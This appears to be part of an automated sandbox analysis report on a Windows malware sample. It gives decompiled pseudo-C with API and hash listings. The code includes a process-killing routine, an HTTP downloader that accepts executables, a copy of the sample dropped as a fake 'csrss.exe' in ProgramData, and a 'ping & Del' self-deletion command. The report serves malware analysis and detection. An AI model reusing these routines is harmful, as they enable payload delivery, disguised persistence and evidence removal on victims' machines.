                                                                                                        0x00408743
                                                                                                        0x00408750
                                                                                                        0x00408758
                                                                                                        0x0040875f
                                                                                                        0x00408766
                                                                                                        0x0040876d
                                                                                                        0x00408774
                                                                                                        0x0040877b
                                                                                                        0x0040878a
                                                                                                        0x00408792
                                                                                                        0x00408797
                                                                                                        0x00000000
                                                                                                        0x00408799
                                                                                                        0x0040879d
                                                                                                        0x004087a8
                                                                                                        0x004087b9
                                                                                                        0x004087b9
                                                                                                        0x0040878c
                                                                                                        0x0040878c
                                                                                                        0x00408791
                                                                                                        0x00408791

                                                                                                        APIs
                                                                                                        • NtOpenProcess.NTDLL(00000000,00000001,?,?), ref: 00408782
                                                                                                        • NtTerminateProcess.NTDLL(00000000,00000000), ref: 0040879D
                                                                                                        • NtClose.NTDLL(00000000), ref: 004087A8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CloseOpenTerminate
                                                                                                        • String ID: #J@
                                                                                                        • API String ID: 4223285941-3103836084
                                                                                                        • Opcode ID: 0cd67fea19399cdfc16dda180af005950f28b9e31626766ad2c06f3bb9fa3847
                                                                                                        • Instruction ID: 8b2c6ad6389722ad4d186c6c61001f468c4fd018603b84c5e18b7e3fb15685ad
                                                                                                        • Opcode Fuzzy Hash: 0cd67fea19399cdfc16dda180af005950f28b9e31626766ad2c06f3bb9fa3847
                                                                                                        • Instruction Fuzzy Hash: 5B010C71E0120CABDB10DFA0D948BDFBBF8EB04305F14419AE808F7280D7799A489BD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401800, Relevance: 2.5, APIs: 2, Instructions: 31memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00401800(intOrPtr* _a4) {
				void* _t5;
				void* _t8;
				void* _t9;
				void _t10;
				intOrPtr* _t11;
				void* _t12;

				_t11 = _a4;
				_t5 = 0;
				if( *_t11 != 0) {
					do {
						_t5 = _t5 + 1;
					} while ( *((char*)(_t5 + _t11)) != 0);
				}
				_t8 = HeapAlloc(GetProcessHeap(), 0, _t5 + 1);
				_t10 =  *_t11;
				_t9 = _t8;
				if(_t10 != 0) {
					_t12 = _t11 - _t8;
					do {
						 *_t9 = _t10;
						_t9 = _t9 + 1;
						_t10 =  *((intOrPtr*)(_t12 + _t9));
					} while (_t10 != 0);
				}
				 *_t9 = 0;
				return _t8;
			}









                                                                                                        0x00401804
                                                                                                        0x00401807
                                                                                                        0x0040180b
                                                                                                        0x00401810
                                                                                                        0x00401810
                                                                                                        0x00401811
                                                                                                        0x00401810
                                                                                                        0x00401822
                                                                                                        0x00401828
                                                                                                        0x0040182a
                                                                                                        0x0040182e
                                                                                                        0x00401830
                                                                                                        0x00401832
                                                                                                        0x00401832
                                                                                                        0x00401834
                                                                                                        0x00401837
                                                                                                        0x0040183a
                                                                                                        0x00401832
                                                                                                        0x0040183e
                                                                                                        0x00401843

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,?,?,004052B1,?), ref: 0040181B
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,004052B1,?), ref: 00401822
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1617791916-0
                                                                                                        • Opcode ID: 3da18ee757283d3823c3ecc1c7d213f8c7222e7c0b475c9d3fce85658518ca9d
                                                                                                        • Instruction ID: b73465cae51e9fc63f2ab920ad57f2ce1bbeed3a8eb4a9efde1b3dbfd0151c34
                                                                                                        • Opcode Fuzzy Hash: 3da18ee757283d3823c3ecc1c7d213f8c7222e7c0b475c9d3fce85658518ca9d
                                                                                                        • Instruction Fuzzy Hash: ECF055320092909EEB222F3488443727FE99F0B344F1C84EED8C59B3A2D63B8D48C394
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406D50, Relevance: 1.5, APIs: 1, Instructions: 8nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00406D50() {
				void* _t1;

				_t1 =  *0x5d2df8; // 0x3fc
				if(_t1 != 0 && _t1 != 0xffffffff) {
					return NtClose(_t1);
				}
				return _t1;
			}




                                                                                                        0x00406d50
                                                                                                        0x00406d57
                                                                                                        0x00000000
                                                                                                        0x00406d5f
                                                                                                        0x00406d65

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 9b87d2fed563e4884bb86ea922c3d925729189868286ecac45f0bef62ca048df
                                                                                                        • Instruction ID: 1cc971618bee3f163804a16a1d445a44e399e0157dcd427ad3a3562554af56f5
                                                                                                        • Opcode Fuzzy Hash: 9b87d2fed563e4884bb86ea922c3d925729189868286ecac45f0bef62ca048df
                                                                                                        • Instruction Fuzzy Hash: D6B0923070564157CE30AB38AC8CA1633685E6032132A0723F037E21E4EA38C8EAA61E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406D70, Relevance: 1.5, APIs: 1, Instructions: 8nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00406D70() {
				void* _t1;

				_t1 =  *0x5d2dfc; // 0x3f8
				if(_t1 != 0 && _t1 != 0xffffffff) {
					return NtClose(_t1);
				}
				return _t1;
			}




                                                                                                        0x00406d70
                                                                                                        0x00406d77
                                                                                                        0x00000000
                                                                                                        0x00406d7f
                                                                                                        0x00406d85

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 63ba5de6b47e9ee9e8b3dcd5553fb007b603a39dc8debe5b0c00047f8c24c2ac
                                                                                                        • Instruction ID: 76f8495102a0d5e2d14eb48cf16d234cca2194880bcae08c05adfe453fa08bf3
                                                                                                        • Opcode Fuzzy Hash: 63ba5de6b47e9ee9e8b3dcd5553fb007b603a39dc8debe5b0c00047f8c24c2ac
                                                                                                        • Instruction Fuzzy Hash: F4B092307055815BCE70AB79AC4CA1633686E603213150723A83BE12E4EA38C8AEA62D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407C30, Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 241networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E00407C30(void* __ecx, void* __edx, void* __eflags, char* _a4, intOrPtr* _a8) {
				void _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t53;
				int _t54;
				void* _t62;
				void* _t63;
				void* _t72;
				long _t88;
				long _t103;
				char* _t108;
				intOrPtr _t109;
				char* _t111;
				void* _t114;
				long _t116;
				void* _t123;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;

				E00401BB0( &_v108, 0, 0x38);
				_t108 = _a4;
				_v24 = 0;
				_t103 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t53 = E00401850(_t108);
				_t125 = _t123 + 0x10;
				_t54 = InternetCrackUrlA(_t108, _t53, 0,  &_v112);
				if(_t54 != 0) {
					_t111 = E004015E0(_v92 + 1);
					E00401BB0(_t111, 0, _v92 + 1);
					E00401640(_t111, _v96, _v92);
					_t126 = _t125 + 0x1c;
					_t62 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
					_v20 = _t62;
					if(_t62 != 0) {
						_t63 = InternetConnectA(_t62, _t111, _v88, 0, 0, 3, 0, 0);
						_v16 = _t63;
						_push(_t111);
						if(_t63 != 0) {
							E00401510();
							E004018D0(_t108, "https://");
							_t127 = _t126 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t113 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t114 = HttpOpenRequestA(_v16, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
							_v12 = _t114;
							if(_t114 == 0) {
								L24:
								InternetCloseHandle(_v16);
								InternetCloseHandle(_v20);
								return 0;
							} else {
								_t72 = E004018D0(_t108, "https://");
								_t128 = _t127 + 8;
								if(_t72 == 0) {
									L10:
									if(HttpSendRequestA(_t114, 0, 0, 0, 0) == 0) {
										goto L23;
									} else {
										_t116 = 0x400;
										_t109 = E004015E0(0x400);
										_t129 = _t128 + 4;
										if(_t109 == 0) {
											_t114 = _v12;
											goto L23;
										} else {
											do {
												if(InternetReadFile(_v12, _t109 + _t103, _t116,  &_v24) == 0) {
													if(GetLastError() != 0x7a) {
														E00401510(_t109);
														L21:
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														return 0;
													} else {
														_t116 = _t116 + 0x400;
														goto L15;
													}
												} else {
													_t88 = _v24;
													if(_t88 == 0) {
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														 *_a8 = _t109;
														return _t103;
													} else {
														_t103 = _t103 + _t88;
														goto L15;
													}
												}
												goto L25;
												L15:
												_t109 = E004016A0(_t109, _t116 + _t103);
												_t129 = _t129 + 8;
											} while (_t109 != 0);
											goto L21;
										}
									}
								} else {
									_v8 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t114, 0x1f,  &_v8,  &_v28) == 0) {
										L23:
										InternetCloseHandle(_t114);
										goto L24;
									} else {
										_v8 = _v8 | 0x00000180;
										if(InternetSetOptionA(_t114, 0x1f,  &_v8, 4) == 0) {
											goto L23;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E00401510();
							InternetCloseHandle(_v20);
							return 0;
						}
					} else {
						E00401510(_t111);
						return 0;
					}
				} else {
					return _t54;
				}
				L25:
			}










































                                                                                                        0x00407c40
                                                                                                        0x00407c45
                                                                                                        0x00407c4e
                                                                                                        0x00407c55
                                                                                                        0x00407c57
                                                                                                        0x00407c5e
                                                                                                        0x00407c65
                                                                                                        0x00407c6f
                                                                                                        0x00407c76
                                                                                                        0x00407c7d
                                                                                                        0x00407c82
                                                                                                        0x00407c87
                                                                                                        0x00407c8f
                                                                                                        0x00407ca2
                                                                                                        0x00407cac
                                                                                                        0x00407cb8
                                                                                                        0x00407cbd
                                                                                                        0x00407ccd
                                                                                                        0x00407cd3
                                                                                                        0x00407cd8
                                                                                                        0x00407cfb
                                                                                                        0x00407d01
                                                                                                        0x00407d04
                                                                                                        0x00407d07
                                                                                                        0x00407d23
                                                                                                        0x00407d33
                                                                                                        0x00407d38
                                                                                                        0x00407d3b
                                                                                                        0x00407d44
                                                                                                        0x00407d50
                                                                                                        0x00407d57
                                                                                                        0x00407d5a
                                                                                                        0x00407d67
                                                                                                        0x00407d76
                                                                                                        0x00407d87
                                                                                                        0x00407d89
                                                                                                        0x00407d8e
                                                                                                        0x00407eb2
                                                                                                        0x00407eb5
                                                                                                        0x00407ec3
                                                                                                        0x00407ecd
                                                                                                        0x00407d94
                                                                                                        0x00407d9a
                                                                                                        0x00407d9f
                                                                                                        0x00407da4
                                                                                                        0x00407de7
                                                                                                        0x00407df8
                                                                                                        0x00000000
                                                                                                        0x00407dfe
                                                                                                        0x00407dfe
                                                                                                        0x00407e09
                                                                                                        0x00407e0b
                                                                                                        0x00407e10
                                                                                                        0x00407ea7
                                                                                                        0x00000000
                                                                                                        0x00407e16
                                                                                                        0x00407e16
                                                                                                        0x00407e2a
                                                                                                        0x00407e53
                                                                                                        0x00407e81
                                                                                                        0x00407e89
                                                                                                        0x00407e92
                                                                                                        0x00407e97
                                                                                                        0x00407e9c
                                                                                                        0x00407ea6
                                                                                                        0x00407e55
                                                                                                        0x00407e55
                                                                                                        0x00000000
                                                                                                        0x00407e55
                                                                                                        0x00407e2c
                                                                                                        0x00407e2c
                                                                                                        0x00407e31
                                                                                                        0x00407e66
                                                                                                        0x00407e6b
                                                                                                        0x00407e70
                                                                                                        0x00407e78
                                                                                                        0x00407e7f
                                                                                                        0x00407e33
                                                                                                        0x00407e33
                                                                                                        0x00000000
                                                                                                        0x00407e33
                                                                                                        0x00407e31
                                                                                                        0x00000000
                                                                                                        0x00407e35
                                                                                                        0x00407e3f
                                                                                                        0x00407e41
                                                                                                        0x00407e44
                                                                                                        0x00000000
                                                                                                        0x00407e48
                                                                                                        0x00407e10
                                                                                                        0x00407da6
                                                                                                        0x00407da9
                                                                                                        0x00407db0
                                                                                                        0x00407dc3
                                                                                                        0x00407eaa
                                                                                                        0x00407eb0
                                                                                                        0x00000000
                                                                                                        0x00407dc9
                                                                                                        0x00407dc9
                                                                                                        0x00407de1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00407de1
                                                                                                        0x00407dc3
                                                                                                        0x00407da4
                                                                                                        0x00407d09
                                                                                                        0x00407d09
                                                                                                        0x00407d14
                                                                                                        0x00407d22
                                                                                                        0x00407d22
                                                                                                        0x00407cda
                                                                                                        0x00407cdb
                                                                                                        0x00407ceb
                                                                                                        0x00407ceb
                                                                                                        0x00407c96
                                                                                                        0x00407c96
                                                                                                        0x00407c96
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • InternetCrackUrlA.WININET(00000044,00000000,?), ref: 00407C87
                                                                                                        • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00407CCD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CrackOpen
                                                                                                        • String ID: GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                        • API String ID: 1262293563-1634511642
                                                                                                        • Opcode ID: f6c8cf70005e460737aeb64da07ddfed1755531fa4350254e23b284514829349
                                                                                                        • Instruction ID: 4be7173def1fabf2422f7d93ddf0ca221e4e961e0538c85c9162d68e93896e62
                                                                                                        • Opcode Fuzzy Hash: f6c8cf70005e460737aeb64da07ddfed1755531fa4350254e23b284514829349
                                                                                                        • Instruction Fuzzy Hash: BD71E471E00209BBEB10AFA1ED45BAEBBB8EF44324F104176F904F62D1D7796D10CA99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004076A0, Relevance: 37.0, APIs: 11, Strings: 10, Instructions: 284fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E004076A0(short __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v1116;
				char _v1636;
				short _v4196;
				void* _t53;
				WCHAR* _t54;
				WCHAR* _t56;
				WCHAR* _t58;
				WCHAR* _t59;
				WCHAR* _t60;
				signed int _t62;
				WCHAR* _t66;
				WCHAR* _t81;
				WCHAR* _t82;
				void* _t87;
				void* _t88;
				WCHAR* _t103;
				WCHAR* _t107;
				WCHAR* _t110;
				int _t115;
				signed int _t120;
				WCHAR* _t121;
				WCHAR* _t122;
				void* _t140;
				intOrPtr* _t141;
				WCHAR* _t143;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t155;
				void* _t156;

				_t130 = __ecx;
				_t148 = _t147 - 0x1060;
				_t156 =  *0x5d2e00 - 0xc350; // 0x0
				if(_t156 >= 0) {
					L39:
					__eflags = 0;
					return 0;
				} else {
					_t157 =  *0x5d1c4c;
					if( *0x5d1c4c == 0) {
						goto L39;
					} else {
						E00401BB0( &_v92, 0, 0x44);
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x14], xmm0");
						_t53 = E00407C30(_t130, __edx, _t157, _a4,  &_v8);
						_t135 = _t53;
						_t149 = _t148 + 0x14;
						if(_t53 != 0) {
							_t141 = __imp__GetLongPathNameW;
							_t54 =  *_t141("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", 0x200, _t140);
							__eflags = _t54;
							if(_t54 == 0) {
								L37:
								_push(_v8);
								goto L38;
							} else {
								__eflags = _t54 - 0x200;
								if(_t54 > 0x200) {
									goto L37;
								} else {
									_t56 = E00401A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "C:\ProgramData\LKBNMTFJgl");
									_t149 = _t149 + 8;
									__eflags = _t56;
									if(_t56 != 0) {
										L10:
										_t58 = GetTempPathW(0x200,  &_v1116);
										__eflags = _t58;
										if(_t58 == 0) {
											goto L37;
										} else {
											__eflags = _t58 - 0x200;
											if(_t58 > 0x200) {
												goto L37;
											} else {
												_t59 =  &_v1116;
												_t60 =  *_t141(_t59, _t59, 0x200);
												__eflags = _t60;
												if(_t60 == 0) {
													goto L37;
												} else {
													__eflags = _t60 - 0x200;
													if(_t60 > 0x200) {
														goto L37;
													} else {
														_t62 = E00401B40( &_v1116);
														_t151 = _t149 + 4;
														__eflags =  *((short*)(_t146 + _t62 * 2 - 0x45a)) - 0x5c;
														if( *((short*)(_t146 + _t62 * 2 - 0x45a)) != 0x5c) {
															 *((short*)(_t146 + E00401B40( &_v1116) * 2 - 0x458)) = 0x5c;
															_t120 = E00401B40( &_v1116);
															_t151 = _t151 + 8;
															_t130 = 0;
															__eflags = 0;
															 *((short*)(_t146 + _t120 * 2 - 0x456)) = 0;
														}
														E00401970( &_v1116, "csrss.exe");
														_t152 = _t151 + 8;
														goto L17;
													}
												}
											}
										}
									} else {
										_t121 = E00401A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", L"ProgramData");
										_t149 = _t149 + 8;
										__eflags = _t121;
										if(_t121 != 0) {
											goto L10;
										} else {
											_t122 = E00401A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "LKBNMTFJgl");
											_t149 = _t149 + 8;
											__eflags = _t122;
											if(_t122 != 0) {
												goto L10;
											} else {
												E00401A00( &_v1116, "C:\ProgramData\LKBNMTFJgl");
												E00401970( &_v1116, "\\");
												E00401970( &_v1116, "csrss.exe");
												_t152 = _t149 + 0x18;
												E00406D50();
												L17:
												_t66 = E004087C0( &_v1116, _v8, _t135);
												_t149 = _t152 + 0xc;
												_push(_v8);
												__eflags = _t66;
												if(_t66 == 0) {
													L38:
													E00401510();
													 *0x5d2e00 =  &(( *0x5d2e00)[0]);
													__eflags =  *0x5d2e00;
													goto L39;
												} else {
													E00401510();
													_t143 = E004015E0(0x24);
													_t153 = _t149 + 8;
													__eflags = _t143;
													if(_t143 != 0) {
														_t81 = E00408B20( &_v1116, _t143);
														_t155 = _t153 + 8;
														__eflags = _t81;
														if(_t81 != 0) {
															_t143[0x10] = 0;
															_t82 = E00401740(_t143, _a16);
															_t155 = _t155 + 8;
															_push(_t143);
															__eflags = _t82;
															if(_t82 != 0) {
																goto L21;
															} else {
																E00401510();
																_t153 = _t155 + 4;
																__eflags =  *0x5d1300;
																if( *0x5d1300 == 0) {
																	L29:
																	__eflags = _a12;
																	if(_a12 != 0) {
																		E00408730(_a8);
																		_t153 = _t153 + 4;
																	}
																	 *0x5d2118 = 1;
																	_t87 =  *0x5d211c; // 0x1f8
																	__eflags = _t87;
																	if(_t87 == 0) {
																		L33:
																		_t88 =  *0x5d2120; // 0x0
																		__eflags = _t88;
																		if(_t88 != 0) {
																			TerminateThread(_t88, 0);
																		}
																		E00401A00( &_v4196, L"cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q \"");
																		E00401970( &_v4196, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe");
																		E00401970( &_v4196, L"\" & \"");
																		E00401970( &_v4196,  &_v1116);
																		E00401970( &_v4196, "\"");
																		_t153 = _t153 + 0x28;
																		_t103 = CreateProcessW(0,  &_v4196, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
																		__eflags = _t103;
																		if(_t103 != 0) {
																			CloseHandle(_v24.hThread);
																			CloseHandle(_v24);
																			ExitProcess(0);
																		}
																	} else {
																		_t107 = WaitForSingleObject(_t87, 0xea60);
																		__eflags = _t107;
																		if(_t107 == 0) {
																			goto L33;
																		}
																	}
																} else {
																	_t143 = E004015E0(0x400);
																	_t153 = _t153 + 4;
																	__eflags = _t143;
																	if(_t143 != 0) {
																		_t110 = E00407FA0(_t130, _t143, 0x40aad0, 7);
																		_t155 = _t153 + 0xc;
																		__eflags = _t110;
																		if(_t110 == 0) {
																			goto L20;
																		} else {
																			E00401970(_t143, "\\");
																			E00401970(_t143, "viTRMUuKeV");
																			E00401970(_t143, L".url");
																			_t155 = _t155 + 0x18;
																			E00406D70();
																			_t115 = DeleteFileW(_t143);
																			_push(_t143);
																			__eflags = _t115;
																			if(_t115 == 0) {
																				goto L21;
																			} else {
																				E00401510();
																				_t153 = _t155 + 4;
																				goto L29;
																			}
																		}
																	}
																}
															}
														} else {
															L20:
															_push(_t143);
															L21:
															E00401510();
															_t153 = _t155 + 4;
														}
													}
													DeleteFileW( &_v1116);
													 *0x5d2e00 =  &(( *0x5d2e00)[0]);
													E00401A00( &_v1636, "C:\ProgramData\LKBNMTFJgl");
													E00401970( &_v1636, "\\");
													E00401970( &_v1636, "csrss.exe");
													E00406340( &_v1636);
													__eflags = 0;
													return 0;
												}
											}
										}
									}
								}
							}
						} else {
							 *0x5d2e00 =  &(( *0x5d2e00)[0]);
							return _t53;
						}
					}
				}
			}








































                                                                                                        0x004076a0
                                                                                                        0x004076a8
                                                                                                        0x004076ae
                                                                                                        0x004076b5
                                                                                                        0x00407a92
                                                                                                        0x00407a92
                                                                                                        0x00407a97
                                                                                                        0x004076bb
                                                                                                        0x004076bb
                                                                                                        0x004076c3
                                                                                                        0x00000000
                                                                                                        0x004076c9
                                                                                                        0x004076d2
                                                                                                        0x004076da
                                                                                                        0x004076e1
                                                                                                        0x004076e5
                                                                                                        0x004076ea
                                                                                                        0x004076ec
                                                                                                        0x004076f1
                                                                                                        0x00407700
                                                                                                        0x00407715
                                                                                                        0x00407717
                                                                                                        0x00407719
                                                                                                        0x00407a7e
                                                                                                        0x00407a7e
                                                                                                        0x00000000
                                                                                                        0x0040771f
                                                                                                        0x0040771f
                                                                                                        0x00407724
                                                                                                        0x00000000
                                                                                                        0x0040772a
                                                                                                        0x00407734
                                                                                                        0x00407739
                                                                                                        0x0040773c
                                                                                                        0x0040773e
                                                                                                        0x004077ac
                                                                                                        0x004077b8
                                                                                                        0x004077be
                                                                                                        0x004077c0
                                                                                                        0x00000000
                                                                                                        0x004077c6
                                                                                                        0x004077c6
                                                                                                        0x004077cb
                                                                                                        0x00000000
                                                                                                        0x004077d1
                                                                                                        0x004077d6
                                                                                                        0x004077de
                                                                                                        0x004077e0
                                                                                                        0x004077e2
                                                                                                        0x00000000
                                                                                                        0x004077e8
                                                                                                        0x004077e8
                                                                                                        0x004077ed
                                                                                                        0x00000000
                                                                                                        0x004077f3
                                                                                                        0x004077fa
                                                                                                        0x004077ff
                                                                                                        0x00407802
                                                                                                        0x0040780b
                                                                                                        0x0040781e
                                                                                                        0x0040782d
                                                                                                        0x00407832
                                                                                                        0x00407835
                                                                                                        0x00407835
                                                                                                        0x00407837
                                                                                                        0x00407837
                                                                                                        0x0040784b
                                                                                                        0x00407850
                                                                                                        0x00000000
                                                                                                        0x00407850
                                                                                                        0x004077ed
                                                                                                        0x004077e2
                                                                                                        0x004077cb
                                                                                                        0x00407740
                                                                                                        0x0040774a
                                                                                                        0x0040774f
                                                                                                        0x00407752
                                                                                                        0x00407754
                                                                                                        0x00000000
                                                                                                        0x00407756
                                                                                                        0x00407760
                                                                                                        0x00407765
                                                                                                        0x00407768
                                                                                                        0x0040776a
                                                                                                        0x00000000
                                                                                                        0x0040776c
                                                                                                        0x00407778
                                                                                                        0x00407789
                                                                                                        0x0040779a
                                                                                                        0x0040779f
                                                                                                        0x004077a2
                                                                                                        0x00407853
                                                                                                        0x0040785e
                                                                                                        0x00407863
                                                                                                        0x00407866
                                                                                                        0x00407869
                                                                                                        0x0040786b
                                                                                                        0x00407a81
                                                                                                        0x00407a81
                                                                                                        0x00407a89
                                                                                                        0x00407a89
                                                                                                        0x00000000
                                                                                                        0x00407871
                                                                                                        0x00407871
                                                                                                        0x00407883
                                                                                                        0x00407885
                                                                                                        0x00407888
                                                                                                        0x0040788a
                                                                                                        0x00407894
                                                                                                        0x00407899
                                                                                                        0x0040789c
                                                                                                        0x0040789e
                                                                                                        0x00407906
                                                                                                        0x0040790b
                                                                                                        0x00407910
                                                                                                        0x00407913
                                                                                                        0x00407914
                                                                                                        0x00407916
                                                                                                        0x00000000
                                                                                                        0x00407918
                                                                                                        0x00407918
                                                                                                        0x0040791d
                                                                                                        0x00407920
                                                                                                        0x00407927
                                                                                                        0x00407995
                                                                                                        0x00407995
                                                                                                        0x00407999
                                                                                                        0x0040799e
                                                                                                        0x004079a3
                                                                                                        0x004079a3
                                                                                                        0x004079ad
                                                                                                        0x004079af
                                                                                                        0x004079b4
                                                                                                        0x004079b6
                                                                                                        0x004079cc
                                                                                                        0x004079cc
                                                                                                        0x004079d1
                                                                                                        0x004079d3
                                                                                                        0x004079d8
                                                                                                        0x004079d8
                                                                                                        0x004079ea
                                                                                                        0x004079fb
                                                                                                        0x00407a0c
                                                                                                        0x00407a1f
                                                                                                        0x00407a30
                                                                                                        0x00407a35
                                                                                                        0x00407a58
                                                                                                        0x00407a5e
                                                                                                        0x00407a60
                                                                                                        0x00407a6f
                                                                                                        0x00407a74
                                                                                                        0x00407a78
                                                                                                        0x00407a78
                                                                                                        0x004079b8
                                                                                                        0x004079be
                                                                                                        0x004079c4
                                                                                                        0x004079c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004079c6
                                                                                                        0x00407929
                                                                                                        0x00407933
                                                                                                        0x00407935
                                                                                                        0x00407938
                                                                                                        0x0040793a
                                                                                                        0x00407948
                                                                                                        0x0040794d
                                                                                                        0x00407950
                                                                                                        0x00407952
                                                                                                        0x00000000
                                                                                                        0x00407958
                                                                                                        0x0040795e
                                                                                                        0x00407969
                                                                                                        0x00407974
                                                                                                        0x00407979
                                                                                                        0x0040797c
                                                                                                        0x00407982
                                                                                                        0x00407984
                                                                                                        0x00407985
                                                                                                        0x00407987
                                                                                                        0x00000000
                                                                                                        0x0040798d
                                                                                                        0x0040798d
                                                                                                        0x00407992
                                                                                                        0x00000000
                                                                                                        0x00407992
                                                                                                        0x00407987
                                                                                                        0x00407952
                                                                                                        0x0040793a
                                                                                                        0x00407927
                                                                                                        0x004078a0
                                                                                                        0x004078a0
                                                                                                        0x004078a0
                                                                                                        0x004078a1
                                                                                                        0x004078a1
                                                                                                        0x004078a6
                                                                                                        0x004078a6
                                                                                                        0x0040789e
                                                                                                        0x004078b0
                                                                                                        0x004078b2
                                                                                                        0x004078c5
                                                                                                        0x004078d6
                                                                                                        0x004078e7
                                                                                                        0x004078f3
                                                                                                        0x004078fb
                                                                                                        0x00407902
                                                                                                        0x00407902
                                                                                                        0x0040786b
                                                                                                        0x0040776a
                                                                                                        0x00407754
                                                                                                        0x0040773e
                                                                                                        0x00407724
                                                                                                        0x004076f3
                                                                                                        0x004076f3
                                                                                                        0x004076fe
                                                                                                        0x004076fe
                                                                                                        0x004076f1
                                                                                                        0x004076c3

                                                                                                        APIs
                                                                                                          • Part of subcall function 00407C30: InternetCrackUrlA.WININET(00000044,00000000,?), ref: 00407C87
                                                                                                        • GetLongPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,00000200), ref: 00407715
                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004078B0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CrackDeleteFileInternetLongNamePath
